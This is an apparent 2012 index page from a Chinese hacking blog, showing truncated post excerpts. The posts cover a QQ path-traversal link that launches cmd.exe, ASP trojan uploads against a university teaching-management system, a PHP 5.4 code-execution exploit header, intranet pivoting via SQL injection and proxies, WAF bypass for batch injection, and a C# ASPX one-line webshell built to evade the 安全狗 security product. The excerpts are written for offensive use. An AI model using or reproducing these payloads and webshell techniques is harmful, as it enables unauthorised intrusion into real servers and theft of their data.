腾讯TM、QQ远程命令执行漏洞 点开QQ消息 执行本地文件命令!

分类:新闻 | 2012-05-23 | 撸过 565 次
2人扯谈

 

 

当用户发送此类格式“网址”的时候:

www.webshell.cc..\..\..\..\..\..\..\Windows\System32\cmd.exe

对方接收之后,点击鼠标左键打开该网址的时候,会被当成路径打开,从而可以恶意执行一些程序、系统命令,造成严重安全隐患。

漏洞原理很简单,不解释了……

条件如下:

1、不能 url 编码,只能明文,囧rz……

2、不能使用中、英文空格,路径会被“打断”。(可以试试自定义发包构造一下,或者尝试一下 Web 端发送。)

3、不能存在 % 号等特殊字符,原因和[......]

继续阅读

暗黑3疑似遭黑客攻击 玩家被洗劫一空

分类:新闻 | 2012-05-23 | 撸过 523 次
1人扯谈

         《暗黑破坏神3》自15日发售以来至今已有一周多的时间,由于网络链接质量和错误代码的频繁出现让玩家们对本作抱怨不已,但就在此时有些玩家称自己的游戏帐号被盗了……

  日前,据国外媒体报道称,由于游戏安全性问题现已发现多宗《暗黑3》帐户被盗。据介绍,此事件发生在上周日的下午约4点时,一些玩家登陆游戏时出现错误33和33007的代码,但就在重新登陆游戏后,却发现自己游戏中的各种物品和金币都已经被全部盗空。

  与此同时,这些玩家称之前曾在某论坛里看见有关疑似黑客打算对游戏欧洲服务器进行SQL注入攻击,但没有得到相关证实。另外,这些被盗的游戏帐户都有一个共同的特征,那就是他们的暴[......]

继续阅读

通过Zend目录权限不严获取执行权限

分类:安全 | 2012-05-23 | 撸过 548 次
0人扯谈

服务器上很多都装了 Zend
就算 C:\Program Files 设置过权限,安装Zend后,Zend 会自动配置目录的权限
C:\Program Files\Zend\ZendOptimizer-3.3.0 下的目录权限为 Everyone 全权,这导致入侵者能写入文件。

如果黑客入侵一个服务器,只支持 asp,或php,没有执行权限,执行组件也给禁用了,只有读写文件的权限(只要读写权限就够)。
但 C:\Program Files\Zend\ZendOptimizer-3.3.0lib 下有 ZendExtensionManager.dll 文件,
而这个文件就算加载了,也能通过"[......]

继续阅读

快速找到windows2003系统下是哪个网站发包

分类:技术 | 2012-05-23 | 撸过 484 次
0人扯谈

 

可以在本站查找phpddos解决方案

首先是看本地连接的收包和发包量,排除服务器被黑的情况,

然后打开C:\WINDOWS\system32\LogFiles\HTTPERR ,找到最新的一个iis日志,

然后ctrl+F 搜索port=如果出现“port= ”关键词,然后看后面会有一串数字,

这串数字是网站的标识符,这样就可以直接看到是哪个站点流量高了,直接关闭即可

关于“高校现代教学管理系统漏洞”的攻击与防范

分类:安全 | 2012-05-23 | 撸过 630 次
0人扯谈

作者:Blackeagle

转载文章请保留版权www.blackeagle.name

QQ空间和博客同时首发

前段时间在群里看到一哥们分享了一个“高校现代教学管理系统漏洞”,方法很简单,很快就能拿到webshell

原理和fck差不多,也是利用上传功能。
ftb.imagegallery.aspx 这是一个具有上传功能的目录,添加在该网站域名后即可打开。
之后上传带有可解析的asp马(需要解析改后缀,为安全起见就不公开了。)便可直接访问。
截图如下:
首先:搜索

第二步:找到相关可上传的站点域名

上传成功。
第三步:访问该网马的目录

证明:


(上面的图都懒得打码了 一看[......]

继续阅读

PHP 5.4 (5.4.3) Code Execution (Win32)

分类:安全 | 2012-05-16 | 撸过 409 次
0人扯谈
// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)

===================
 offset-brute.html[......]

继续阅读

渗透内网方法之巧用代理

分类:安全 | 2012-05-15 | 撸过 1,017 次
0人扯谈

代理在入侵里的作用-----妙用代理,渗透内网

  一、踩点

  主机: http://www.webshell.cc

  OS:Windows 2000 + IIS 5.0 + MSSQL

  端口:80 21i

  数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网.

  首页存在注入漏洞,sa登陆.

  注入点:

   https://www.webshell.cc/list.asp?id=1

  二、入侵思路

  1.给内网目标机装个代理服务器

  2.把弄好的那个代理端口映到公网.

  3.本机用sockscap连接公网映的那个端口,这[......]

继续阅读

如何绕过D盾进行注入

分类:安全 | 2012-05-15 | 撸过 1,183 次
0人扯谈

少壮不努力,长大遇啊D

----某大黑客

D盾有多不爽我就不说了,现在都是批量注入,时不时的弹出D盾提示,甚是恼人。。。。。

其实这个并不是我发现的,而是国外的一个注入工具。某日本人心血来潮,想换一个linux系统玩玩儿,在互联网上逛了一大圈,发现大半都是带马的网站,甚是不爽,准备关闭、突然一个字眼吸引了我,没错,那就是Anonymous_os,看了下简介说是匿名者做的一个linux内核的操作系统,重点是还附带了32个注入工具,于是我等菜鸟冲着匿名者的大名安装了此系统(注意:不懂英文的同学千万要拿着一本词典进行安装,不然引导扇区被删了可别怪我)

于是我就开始测试,首先切回WIN7系统,[......]

继续阅读

获取使用CDN网站的真实IP

分类:安全 | 2012-05-15 | 撸过 779 次
0人扯谈

现在很多网站用了cdn技术,在做一些测试的时候,想获取其服务器真实IP地址就有点困难,不知道现在还有其他什么好的方法呢,整理了下,目前知道如下两种:

1:拿CDN服务器 找出真实IP

cache_peer 1.1.1.1 parent 80 0 no-query originserver

cache_peer_domain 1.1.1.1 www.xxxx.com

2:判断HTTP_X_FORWARDED_FOR是否为空,不为空把这个作为IP地址,否则取得REMOTE_ADDR作为IP地址。

如果服务器可以上传文件,可上传文件加如下代码:

Request.ServerVariabl[......]

继续阅读

可突破安全狗的aspx一句话

分类:安全, 工具 | 2012-05-15 | 撸过 2,874 次
0人扯谈

在看一个站的时候,发现服务器装了安全狗,刚开始利用IIS6的畸形解析一直被拦截,最后找到了不用畸形解析的办法,传了菜刀的一句话,却连不上,一直返回403,应该是被拦截,后来找了个相对比较生僻的一句话,终于上传并连接成功。

服务端一句话木马:

<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c[......]

继续阅读

第 1 页,共 2 页12